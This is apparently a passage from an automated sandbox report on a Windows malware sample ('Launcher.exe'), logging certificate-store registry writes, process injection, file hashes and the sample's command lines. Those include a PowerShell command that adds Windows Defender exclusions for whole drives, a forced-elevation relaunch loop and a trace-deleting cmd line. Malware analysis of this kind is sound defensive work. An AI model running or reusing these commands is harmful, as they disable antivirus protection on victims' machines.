9463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4232 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4232 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4232 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 4392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
PID 1632 wrote to memory of 4392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
PID 1632 wrote to memory of 4392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
PID 1632 wrote to memory of 4392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
PID 1632 wrote to memory of 4392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
PID 4392 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4392 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4392 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4392 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"

C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT

Network

Country Destination Domain Proto
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp

Files

memory/1632-2-0x0000000072730000-0x0000000072E1E000-memory.dmp

memory/1632-4-0x0000000007430000-0x0000000007440000-memory.dmp

memory/1632-3-0x0000000007310000-0x0000000007346000-memory.dmp

memory/1632-5-0x0000000007430000-0x0000000007440000-memory.dmp

memory/1632-6-0x0000000007A70000-0x0000000008098000-memory.dmp

memory/1632-7-0x0000000007A10000-0x0000000007A32000-memory.dmp

memory/1632-8-0x00000000082F0000-0x0000000008356000-memory.dmp

memory/1632-9-0x00000000083A0000-0x0000000008406000-memory.dmp

memory/1632-10-0x0000000008410000-0x0000000008760000-memory.dmp

memory/1632-11-0x0000000008240000-0x000000000825C000-memory.dmp

memory/1632-12-0x00000000087E0000-0x000000000882B000-memory.dmp

memory/1632-13-0x0000000008B30000-0x0000000008BA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfnruqfw.jm4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1632-28-0x0000000009BB0000-0x0000000009C44000-memory.dmp

memory/1632-29-0x00000000098F0000-0x000000000990A000-memory.dmp

memory/1632-30-0x0000000009940000-0x0000000009962000-memory.dmp

memory/1632-31-0x000000000A150000-0x000000000A64E000-memory.dmp

memory/4216-38-0x0000000072730000-0x0000000072E1E000-memory.dmp

memory/4216-39-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

memory/4216-40-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

memory/4216-57-0x000000007EFE0000-0x000000007EFF0000-memory.dmp

memory/4216-58-0x00000000090F0000-0x0000000009123000-memory.dmp

memory/4216-59-0x000000006F4D0000-0x000000006F51B000-memory.dmp

memory/4216-60-0x00000000090D0000-0x00000000090EE000-memory.dmp

memory/4216-65-0x0000000009140000-0x00000000091E5000-memory.dmp

memory/4216-66-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

memory/1632-192-0x0000000072730000-0x0000000072E1E000-memory.dmp

memory/4216-260-0x0000000006D90000-0x0000000006DAA000-memory.dmp

memory/4216-265-0x0000000006D80000-0x0000000006D88000-memory.dmp

memory/4216-281-0x0000000072730000-0x0000000072E1E000-memory.dmp

memory/1632-282-0x0000000007430000-0x0000000007440000-memory.dmp

memory/1632-284-0x0000000007430000-0x0000000007440000-memory.dmp

memory/1632-285-0x0000000007430000-0x0000000007440000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 69abf6b01a287d3bab9aa753a19562ac
SHA1 cb002d745055132c11e5432f9ca5c8f452c6067d
SHA256 477924224be8ac5194c94a52115ac451c63530c0ce9bfe757598ef9cf84b495e
SHA512 70c2b8f847da67b95a3d15cea9912cddddfc59d7f1f2f350c3c1c13e28baa5f6efd448013e5134e9f909705be7b0e38e6748aacce4237e6b0e2cdedaa647bccf

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 db01a2c1c7e70b2b038edf8ad5ad9826
SHA1 540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256 413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512 c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

memory/1632-290-0x0000000072730000-0x0000000072E1E000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

117s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"

Signatures

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d06035